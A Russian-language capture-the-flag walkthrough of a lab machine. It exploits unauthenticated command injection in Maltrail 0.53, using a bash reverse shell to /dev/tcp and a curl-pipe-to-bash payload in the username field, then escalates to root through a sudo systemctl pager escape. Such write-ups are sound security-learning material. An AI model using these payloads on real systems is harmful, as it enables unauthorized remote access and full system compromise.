Наталья Чабанова @Vespii
Разведка
Сканирование NMAP

Открыты 2 порта - 22(ssh) и 55555(WEB)
Сканирование dirsearch
Они гении и у всех разные директории. В моем случае тут директория test2 самая привлекательная
Она должна выглядеть так
Из интересного должны знать название и версию Maltrail 0.53
У нее есть уязвимость и вот про нее: https://huntr.dev/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87/
Атака
В общем в Maltrail, была выявлена уязвимость выполнения команд без аутентификации. Наличие инъекции команды в params.get("username") является причиной данной уязвимости.
С помощью SSRF + OS Command Injection, мы можем получить удаленный доступ к машине жертвы.
Kак сделать
Создаем файлик rev.sh
bash -i >& /dev/tcp/10.10.x.x/4444 0>&1

Запускаем сервер на Python

Теперь ловим запрос той загадочной директории /test2/ с помощью burp и поменять метод запроса на Post. Потом пишем следующее
username=;`curl свой ip/rev.sh | bash`'

Отправляем и молимся на обратный шел

Дальше по дефолту читаем user.txt

Root flag
Пишем sudo -l и видим такую картину

Вот собственно информация по уязвимости https://gtfobins.github.io/gtfobins/systemctl/#sudo
script /dev/null -c bash
sudo /usr/bin/systemctl status trail.service
!sh

Читаем root.txt

Tags: